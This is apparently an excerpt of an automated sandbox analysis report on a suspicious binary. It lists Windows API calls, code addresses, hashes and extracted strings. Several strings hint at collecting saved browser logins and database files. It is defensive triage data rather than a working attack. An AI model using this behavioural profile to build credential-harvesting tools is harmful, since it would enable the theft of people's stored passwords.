                                                                                                                                                • Opcode ID: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                                                                                                                                • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                • Opcode Fuzzy Hash: 56e4a7d77988e94444627618330347d92b7c0f18510b370ca22fa361cd1098af
                                                                                                                                                • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                • API String ID: 3510742995-3273207271
                                                                                                                                                • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                • memset.MSVCRT ref: 00413ADC
                                                                                                                                                • memset.MSVCRT ref: 00413AEC
                                                                                                                                                  • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                • memset.MSVCRT ref: 00413BD7
                                                                                                                                                • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                • String ID: 3A
                                                                                                                                                • API String ID: 3300951397-293699754
                                                                                                                                                • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                  • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                                                                                                                  • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                                                                                                                • wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                • memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                                                                                                                  • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                                                                                                                • String ID: strings
                                                                                                                                                • API String ID: 3166385802-3030018805
                                                                                                                                                • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                                                                                                                • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                                                                                                                • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 00411AF6
                                                                                                                                                  • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                                                                • wcsrchr.MSVCRT ref: 00411B14
                                                                                                                                                • wcscat.MSVCRT ref: 00411B2E
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: FileModuleNamememsetwcscatwcsrchr
                                                                                                                                                • String ID: AE$.cfg$General$EA
                                                                                                                                                • API String ID: 776488737-1622828088
                                                                                                                                                • Opcode ID: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                • Instruction ID: 09e7cc653f6f297407560738dd106e03d424c3973b250f6ebd227ee33dbedd02
                                                                                                                                                • Opcode Fuzzy Hash: b6de0e43a8c0916aab6107a9d450eab560a3e9a3f2f4477a4909840308f89baa
                                                                                                                                                • Instruction Fuzzy Hash: 9611B93250022C66DF20EF51DC85ACE7378FF54754F1004ABE908B7142DB74ABC88B99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • memset.MSVCRT ref: 0040D8BD
                                                                                                                                                • GetDlgCtrlID.USER32(?), ref: 0040D8C8
                                                                                                                                                • GetWindowTextW.USER32(?,?,00001000), ref: 0040D8DF
                                                                                                                                                • memset.MSVCRT ref: 0040D906
                                                                                                                                                • GetClassNameW.USER32(?,?,000000FF), ref: 0040D91D
                                                                                                                                                • _wcsicmp.MSVCRT ref: 0040D92F
                                                                                                                                                  • Part of subcall function 0040D76E: memset.MSVCRT ref: 0040D781
                                                                                                                                                  • Part of subcall function 0040D76E: _itow.MSVCRT ref: 0040D78F
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$ClassCtrlNameTextWindow_itow_wcsicmp
                                                                                                                                                • String ID: sysdatetimepick32
                                                                                                                                                • API String ID: 1028950076-4169760276
                                                                                                                                                • Opcode ID: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction ID: 7fefccf0184427ff86f81c2eca1e08be5bb75bf3b76f29e65549559b88306b24
                                                                                                                                                • Opcode Fuzzy Hash: eb3a53bf7b2f710d742758b2cc733c17be47e3e423eab4b3bd20e98515a4ffe8
                                                                                                                                                • Instruction Fuzzy Hash: 061177769002197AEB10EB91DC49EDF7BACEF05750F0040BAF508D2192EB749A85CA59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: -journal$-wal
                                                                                                                                                • API String ID: 438689982-2894717839
                                                                                                                                                • Opcode ID: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                                                                                                                • Opcode Fuzzy Hash: 965c02802761a55e0061e92969816aff726aa0d1351d00bdcf48ae58f88995ef
                                                                                                                                                • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C27
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C3A
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C4F
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405C67
                                                                                                                                                • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                                                                • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                                                  • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                                                                • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                                                                • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Item$Dialog$MessageSend
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 3975816621-0
                                                                                                                                                • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                                                                • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                                                                • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                                                                • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                                                  • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                                                  • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                                                                • String ID: .save$http://$https://$log profile$signIn
                                                                                                                                                • API String ID: 1214746602-2708368587
                                                                                                                                                • Opcode ID: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                                                                • Opcode Fuzzy Hash: 3e4eac411a0fb8cde327a0735871c2cff258de2e34b2a7eb3fc074b31144511c
                                                                                                                                                • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2313361498-0
                                                                                                                                                • Opcode ID: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                                                                • Opcode Fuzzy Hash: ae1e8c4172d72900b4b853b02d180aef4faae84485dd6f90a73647b320165284
                                                                                                                                                • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                                                                • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                                                                • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                                                  • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                                                                • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                                                                • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                                                                • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                                                                • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Window$ItemMessageRectSend$Client
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 2047574939-0
                                                                                                                                                • Opcode ID: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                                                                • Opcode Fuzzy Hash: 0a5759caa3c3a2066378adc41c959573f6e4568a1edde2a40f49f69ca2684f31
                                                                                                                                                • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4218492932-0
                                                                                                                                                • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                                                                • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                                                                • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                                                  • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                                                                                                                  • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                                                                                                                • memcpy.MSVCRT ref: 0044A8BF
                                                                                                                                                • memcpy.MSVCRT ref: 0044A90C
                                                                                                                                                • memcpy.MSVCRT ref: 0044A988
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                                                                                                                  • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                                                                                                                • memcpy.MSVCRT ref: 0044A9D8
                                                                                                                                                • memcpy.MSVCRT ref: 0044AA19
                                                                                                                                                • memcpy.MSVCRT ref: 0044AA4A
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy$memset
                                                                                                                                                • String ID: gj
                                                                                                                                                • API String ID: 438689982-4203073231
                                                                                                                                                • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                                                                • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                                                                • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memcpy
                                                                                                                                                • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                                                                • API String ID: 3510742995-2446657581
                                                                                                                                                • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                                                                • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                                                                • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                                                                • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                                                                • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                                                                • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                                                                • memset.MSVCRT ref: 00405ABB
                                                                                                                                                • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                                                                • SetFocus.USER32(?), ref: 00405B76
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: MessageSend$FocusItemmemset
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 4281309102-0
                                                                                                                                                • Opcode ID: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                                                                • Opcode Fuzzy Hash: efd53bebf051b2277f9dab0bebba2bcddea9ab5f54e930dc2bb54400b8a4bf25
                                                                                                                                                • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: _snwprintfwcscat
                                                                                                                                                • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                                                                • API String ID: 384018552-4153097237
                                                                                                                                                • Opcode ID: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                                                                • Opcode Fuzzy Hash: e2d8d0cbab619b5be06ee0f81a04f929cebd05eebf119826ccd3725ad5dc4e14
                                                                                                                                                • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                                                                • String ID: 0$6
                                                                                                                                                • API String ID: 2029023288-3849865405
                                                                                                                                                • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                                                                • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                                                                                                                • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                                                                • memset.MSVCRT ref: 00405455
                                                                                                                                                • memset.MSVCRT ref: 0040546C
                                                                                                                                                • memset.MSVCRT ref: 00405483
                                                                                                                                                • memcpy.MSVCRT ref: 00405498
                                                                                                                                                • memcpy.MSVCRT ref: 004054AD
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: memset$memcpy$ErrorLast
                                                                                                                                                • String ID: 6$\
                                                                                                                                                • API String ID: 404372293-1284684873
                                                                                                                                                • Opcode ID: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction ID: af38dfd20ac5a94c77b7ead9800c7a3089711b207e9f3183cf3669ed78e53beb
                                                                                                                                                • Opcode Fuzzy Hash: c52bb6eee22109a6197316720abdd8282c22b56b49716a990b3966b2803c4fd3
                                                                                                                                                • Instruction Fuzzy Hash: 572141B280112CBBDF11AF99DC45EDF7BACDF15304F0080A6B509E2156E6398B988F65
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
                                                                                                                                                • GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
                                                                                                                                                • GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A0D9
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0E6
                                                                                                                                                • wcscat.MSVCRT ref: 0040A0F5
                                                                                                                                                • wcscpy.MSVCRT ref: 0040A107
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: Time$Formatwcscatwcscpy$DateFileSystem
                                                                                                                                                • String ID:
                                                                                                                                                • API String ID: 1331804452-0
                                                                                                                                                • Opcode ID: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction ID: 70f18838178cd2dbc623065d80ced1a8b0c5b1489d8a310e1ceaee9f81d034e1
                                                                                                                                                • Opcode Fuzzy Hash: f8aa036cb335485c7d93aed18039143b3373b2c7e44f2a4205c7e838cddf6ff7
                                                                                                                                                • Instruction Fuzzy Hash: 321191B284011DBFEB10AF95DC45DEF777CEB01745F104076B904B6091E6399E858B7A
                                                                                                                                                Uniqueness

                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                APIs
                                                                                                                                                  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
                                                                                                                                                  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                                                                  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                                                                  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                                                                  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                                                                  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                                                                                • GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                                                                                Strings
                                                                                                                                                Memory Dump Source
                                                                                                                                                • Source File: 00000004.00000002.1195160399.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                • Snapshot File: hcaresult_4_2_400000_wab.jbxd
                                                                                                                                                Similarity
                                                                                                                                                • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                • API String ID: 2012295524-4050573280
